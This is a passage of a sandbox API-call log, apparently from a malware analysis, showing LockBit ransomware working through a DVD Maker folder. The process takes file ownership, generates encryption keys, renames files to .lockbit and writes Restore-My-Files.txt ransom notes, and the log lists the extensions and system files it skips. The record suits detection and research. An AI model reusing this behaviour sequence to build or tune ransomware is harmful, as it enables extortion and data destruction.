Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.832] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.833] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.833] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.833] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.833] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.833] RtlFreeAnsiString (AnsiString="\\") [0087.834] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0087.834] malloc (_Size=0x200) returned 0x77d800 [0087.834] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.834] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.834] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.834] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.835] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.835] CloseHandle (hObject=0x3ac) returned 1 [0087.835] free (_Block=0x77d800) [0087.835] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0087.835] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.835] malloc (_Size=0x40068) returned 0x3eb0078 [0087.837] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3eb0090 | out: lpFileSize=0x3eb0090*=4955) returned 1 [0087.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ef00ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ef00ac) returned 0x0 [0087.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ef00bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ef00bc) returned 0x0 [0087.838] ReadFile (in: hFile=0x3ac, lpBuffer=0x3eb00ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3eb0078 | out: lpBuffer=0x3eb00ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3eb0078) returned 0x0 [0087.847] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.847] malloc (_Size=0xdc) returned 0x77d800 [0087.847] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xdc, FileInformationClass=0xa) returned 0x0 [0087.848] free (_Block=0x77d800) [0087.848] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.848] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.848] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.848] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f65c205, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f65c205, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0087.848] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.848] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.848] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0087.848] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.848] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.849] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.849] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.849] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.849] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.850] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.850] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.850] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.850] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.850] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.850] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.850] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.850] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.851] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0087.851] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0087.851] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0087.851] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.851] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.851] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0087.851] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.851] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.851] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png") returned=".png" [0087.851] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.851] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.851] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.851] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.852] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.852] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.852] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.852] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.852] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.852] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.852] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.853] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.853] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png.lockbit") returned 105 [0087.853] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.853] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.853] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.853] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.854] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.854] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.854] RtlFreeAnsiString (AnsiString="\\") [0087.854] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0087.854] malloc (_Size=0x200) returned 0x77d800 [0087.854] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.854] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.854] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.854] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.855] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.855] CloseHandle (hObject=0x3b8) returned 1 [0087.855] free (_Block=0x77d800) [0087.855] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0087.855] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.856] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.856] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3081) returned 1 [0087.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0087.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.857] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.865] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.866] malloc (_Size=0xe8) returned 0x77d800 [0087.866] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xe8, FileInformationClass=0xa) returned 0x0 [0087.866] free (_Block=0x77d800) [0087.866] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.866] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.866] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.867] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f52b71d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f52b71d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x17719, dwReserved0=0x0, dwReserved1=0x0, cFileName="scenesscroll.png", cAlternateFileName="")) returned 1 [0087.867] lstrcmpiW (lpString1=".", lpString2="scenesscroll.png") returned -1 [0087.867] lstrcmpiW (lpString1="..", lpString2="scenesscroll.png") returned -1 [0087.867] PathFindExtensionW (pszPath="scenesscroll.png") returned=".png" [0087.867] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.867] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.867] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.868] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.868] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.868] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.868] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.868] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.868] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.868] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.868] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.869] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.869] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.869] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.869] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.869] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.869] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.869] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.869] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.869] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.869] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.869] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="scenesscroll.png") returned -1 [0087.869] lstrcmpiW (lpString1="ntldr", lpString2="scenesscroll.png") returned -1 [0087.869] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="scenesscroll.png") returned -1 [0087.869] lstrcmpiW (lpString1="bootsect.bak", lpString2="scenesscroll.png") returned -1 [0087.869] lstrcmpiW (lpString1="autorun.inf", lpString2="scenesscroll.png") returned -1 [0087.869] lstrcmpiW (lpString1="thumbs.db", lpString2="scenesscroll.png") returned 1 [0087.869] lstrcmpiW (lpString1="iconcache.db", lpString2="scenesscroll.png") returned -1 [0087.869] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.869] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png") returned=".png" [0087.869] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.869] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.869] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.870] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.870] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.870] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.870] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.871] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.871] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.871] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.871] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.871] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png.lockbit") returned 85 [0087.871] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\scenesscroll.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.872] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.872] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.872] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.872] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.873] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.873] RtlFreeAnsiString (AnsiString="\\") [0087.873] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0087.873] malloc (_Size=0x200) returned 0x77d800 [0087.873] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.873] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, 